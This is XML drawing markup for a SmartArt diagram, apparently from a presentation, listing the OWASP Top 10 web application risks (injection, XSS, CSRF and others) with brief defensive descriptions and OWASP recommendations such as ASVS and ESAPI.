    <dgm:cxn modelId="{4FF662A7-AB28-429F-864C-7ABE5405F113}" type="presOf" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{32E4C202-A073-4E81-BC9F-5F3538C94998}"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A30BB18F-E0AE-47B5-ADC6-D7DCF9B5ABE6}" srcId="{99114BD6-AB84-47D7-90FA-E674D66B7A70}" destId="{29D76988-94EC-456A-9326-82A5AA778D9E}" srcOrd="2" destOrd="0" parTransId="{6A4B80EA-0979-48A1-9532-E35ABAD830C6}" sibTransId="{41E4CEE4-E668-414D-904A-3A62818B4066}"/>
    <dgm:cxn modelId="{F5AF1F6E-9C66-4796-998A-0AAADCF54EA0}" type="presOf" srcId="{7816F859-9BB8-418F-993B-33CDEC6D01E8}" destId="{BCBAC2F4-E546-4A38-8714-1F12CC525401}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F34BF083-B836-4506-BB3B-F0A01920D227}" type="presOf" srcId="{024BBBE2-0706-4354-8AB0-3262009E8862}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{F474165F-1E84-42E2-A98E-15E6795C7260}" type="presOf" srcId="{29D76988-94EC-456A-9326-82A5AA778D9E}"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754476D4-7D8C-427D-8A6B-D0B60927777C}" type="presOf" srcId="{C40210B5-480D-4766-978A-36F3F23CB9B8}" destId="{00DAAF4C-114B-41A9-AAA5-51A8EB19C769}"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53179D04-4118-4358-AD17-8CE5C48A534D}" type="presOf" srcId="{FE1D3C8A-BAB1-4DF8-A33A-DAA9700726E1}" destId="{F55C0F19-ACD0-452E-8743-4A25E747654D}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/vList5"/>
    <dgm:cxn modelId="{6010088D-1046-466A-BB02-8A55CE262380}" srcId="{5723059F-06B7-4E57-89DB-EF1AC9A66654}" destId="{9E1EBBD0-E4A0-4B33-A4CB-F66E80AADE45}" srcOrd="2" destOrd="0" parTransId="{53CD5622-4FF7-42BA-82CF-9FA917848989}" sibTransId="{6249606A-E44B-456D-8550-331FDC0465D3}"/>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77428" y="-2222003"/>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Injection flaws, such as SQL, OS, and LDAP injection, occur when </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>untrusted</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
            <a:t> data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2174238" y="111052"/>
        <a:ext cx="5188311" cy="552065"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="760986" y="4712"/>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A1 – Injection</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="798318" y="42044"/>
        <a:ext cx="1338587" cy="690080"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{52F1B1A3-C58C-409E-9189-6742201CA556}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4477428" y="-1419022"/>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XSS flaws occur whenever an application takes </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>untrusted</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
            <a:t> data and sends it to a web browser without proper validation and escaping. XSS allows attackers to execute scripts in the victim’s browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2174238" y="914033"/>
        <a:ext cx="5188311" cy="552065"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{003658D4-D49D-4F10-A431-9B7DDB9AF5BC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="760986" y="807693"/>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A2 – Cross-Site Scripting (XSS)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="798318" y="845025"/>
        <a:ext cx="1338587" cy="690080"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7C8316E6-CCC6-432E-9248-FEE6B536ED74}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4477428" y="-616041"/>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Application functions related to authentication and session management are often not implemented correctly, allowing attackers to compromise passwords, keys, session tokens, or  exploit other implementation flaws to assume other users’ identities.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2174238" y="1717014"/>
        <a:ext cx="5188311" cy="552065"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A6F3CB7F-5F61-44E3-9C30-A5FD20B57740}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="760986" y="1610674"/>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A3 – Broken Authentication and Session Management</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="798318" y="1648006"/>
        <a:ext cx="1338587" cy="690080"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{191C5091-28DD-4765-9653-28B6CE68C4E4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4477428" y="186940"/>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A direct object reference occurs when a developer exposes a reference to an internal implementation object, such as a file, directory, or database key. Without an access control check or other protection, attackers can manipulate these references to access unauthorized data.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2174238" y="2519996"/>
        <a:ext cx="5188311" cy="552065"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{7BBDFC2B-854A-4CD2-A909-AD613CC7FC62}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="760986" y="2413656"/>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A4 – Insecure Direct Object References</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="798318" y="2450988"/>
        <a:ext cx="1338587" cy="690080"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DC3A35B8-DD6D-4881-97A7-11F37E912D62}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4477428" y="989921"/>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a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2174238" y="3322977"/>
        <a:ext cx="5188311" cy="552065"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2E090A74-1099-4AEA-9902-A404935E56DA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="760986" y="3216637"/>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A5 – Cross-Site Request Forgery (CSRF)</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="798318" y="3253969"/>
        <a:ext cx="1338587" cy="690080"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5AF71587-9F2C-4EC1-B860-6DD404B4035A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4477428" y="1792902"/>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Good security requires having a secure configuration defined and deployed for the application, frameworks, application server, web server, database server, and platform. All these settings should be defined, implemented, and maintained as many are not shipped with secure defaults. This includes keeping all software up to date, including all code libraries used by the application.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2174238" y="4125958"/>
        <a:ext cx="5188311" cy="552065"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{83DCA457-5C79-4624-88A4-3B0DB935FCFB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="760986" y="4019618"/>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A6 – Security </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>Misconfiguration</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="798318" y="4056950"/>
        <a:ext cx="1338587" cy="690080"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{56FADFE1-1107-40A2-AFFA-1F804BA9889C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4477428" y="2595883"/>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Many web applications do not properly protect sensitive data, such as credit cards, SSNs, and authentication credentials, with appropriate encryption or hashing. Attackers may steal or modify such weakly protected data to conduct identity theft, credit card fraud, or other crimes.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2174238" y="4928939"/>
        <a:ext cx="5188311" cy="552065"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FAA2C47D-B4B2-4B6C-88DC-FF4BB6876945}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="760986" y="4822599"/>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A7 – Insecure Cryptographic Storage</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="798318" y="4859931"/>
        <a:ext cx="1338587" cy="690080"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4D86F0FC-F50F-41D3-A81F-CF4A5F22CAC5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4477428" y="3398865"/>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Many web applications check URL access rights before rendering protected links and buttons. However, applications need to perform similar access control checks each time these pages are accessed, or attackers will be able to forge URLs to access these hidden pages anyway.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2174238" y="5731921"/>
        <a:ext cx="5188311" cy="552065"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{AF125120-BBE5-4C6D-A4D9-AA1EC3299EDE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="760986" y="5625581"/>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A8 - Failure to Restrict URL Access</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="798318" y="5662913"/>
        <a:ext cx="1338587" cy="690080"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3AEEED12-760D-417A-B975-196C59CB31B8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4477428" y="4201846"/>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Applications frequently fail to authenticate, encrypt, and protect the confidentiality and integrity of sensitive network traffic. When they do, they sometimes support weak algorithms, use expired or invalid certificates, or do not use them correctly. </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2174238" y="6534902"/>
        <a:ext cx="5188311" cy="552065"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F4FC3D9E-43E9-4607-9C8C-93C2D1D5E198}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="760986" y="6428562"/>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A9 - Insufficient Transport Layer Protection</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="798318" y="6465894"/>
        <a:ext cx="1338587" cy="690080"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{5C6BB524-1E1A-40DC-AF21-81BF18606E37}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4477428" y="5004827"/>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n-US" sz="1000" b="0" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
            <a:t>Web applications frequently redirect and forward users to other pages and websites, and use </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>untrusted</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="0" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
            <a:t> data to determine the destination pages. Without proper validation, attackers can redirect victims to phishing or malware sites, or use forwards to access unauthorized pages. </a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2174238" y="7337883"/>
        <a:ext cx="5188311" cy="552065"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{9ABE634A-56CE-4C59-A76B-EF46EF79F3AF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="760986" y="7231543"/>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A10 – </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" kern="1200" dirty="0" err="1" smtClean="0"/>
            <a:t>Unvalidated</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1200" b="1" i="0" u="none" kern="1200" dirty="0" smtClean="0"/>
            <a:t> Redirects and Forwards</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1200" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="798318" y="7268875"/>
        <a:ext cx="1338587" cy="690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65073" y="-2318797"/>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baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>To produce a </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" u="sng" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>secure</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t> web application, you must define what secure means for that application. OWASP recommends you use the OWASP </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId1"/>
            </a:rPr>
            <a:t>Application Security Verification Standard (ASVS)</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>, as a guide for setting the security requirements for your application(s). If you’re outsourcing, consider the </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId2"/>
            </a:rPr>
            <a:t>OWASP Secure Software Contract Annex</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0" smtClean="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2047435" y="136578"/>
        <a:ext cx="5570583" cy="697569"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{13D31E1D-AAA2-4FA3-B46E-809665F827F4}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1107245" y="2210"/>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baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Application Security Requirements</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1153141" y="48106"/>
        <a:ext cx="848397" cy="874511"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6C575B74-7DD4-41BA-8F02-F58225FE5E47}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4465073" y="-1304178"/>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baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Rather than retrofitting security into your applications, it is far more cost effective to design the security in from the start. OWASP recommends the </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId3"/>
            </a:rPr>
            <a:t>OWASP Developer’s Guide</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>, as a good starting point for guidance on how to design security in from the beginning.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2047435" y="1151197"/>
        <a:ext cx="5570583" cy="697569"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{EDABB147-18BF-401D-8EC0-702E6AB23D86}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1107245" y="1016829"/>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solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Application Security Architecture</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="+mn-ea"/>
            <a:cs typeface="+mn-cs"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1153141" y="1062725"/>
        <a:ext cx="848397" cy="874511"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{3CC3FFB7-CE4C-4C73-A032-35593748DB85}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4465073" y="-289560"/>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baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Building strong and usable security controls is exceptionally difficult. Providing developers with a set of standard security controls radically simplifies the development of secure applications. OWASP recommends the </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
            </a:rPr>
            <a:t>OWASP Enterprise Security API (ESAPI) project</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t> as a model for the security APIs needed to produce secure web applications. ESAPI provides reference implementations in </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
            </a:rPr>
            <a:t>Java</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
            </a:rPr>
            <a:t>.NET</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
            </a:rPr>
            <a:t>PHP</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
            </a:rPr>
            <a:t>Classic ASP</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>, </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
            </a:rPr>
            <a:t>Python</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>, and </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:hlinkClick xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:id="rId4"/>
            </a:rPr>
            <a:t>Cold Fusion</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="2047435" y="2165815"/>
        <a:ext cx="5570583" cy="697569"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{844493EC-1BAE-4494-965B-BDA5EE224AC6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1107245" y="2031448"/>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solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Standard Security Controls</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1153141" y="2077344"/>
        <a:ext cx="848397" cy="874511"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{CACE7D9A-45C4-46A3-9002-ACDB900C7D46}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4465073" y="725058"/>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baseline="0" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:rPr>
            <a:t>To improve the process your organization follows when building such applications, OWASP recommends the </a:t>
          </a:r>
          <a:r>
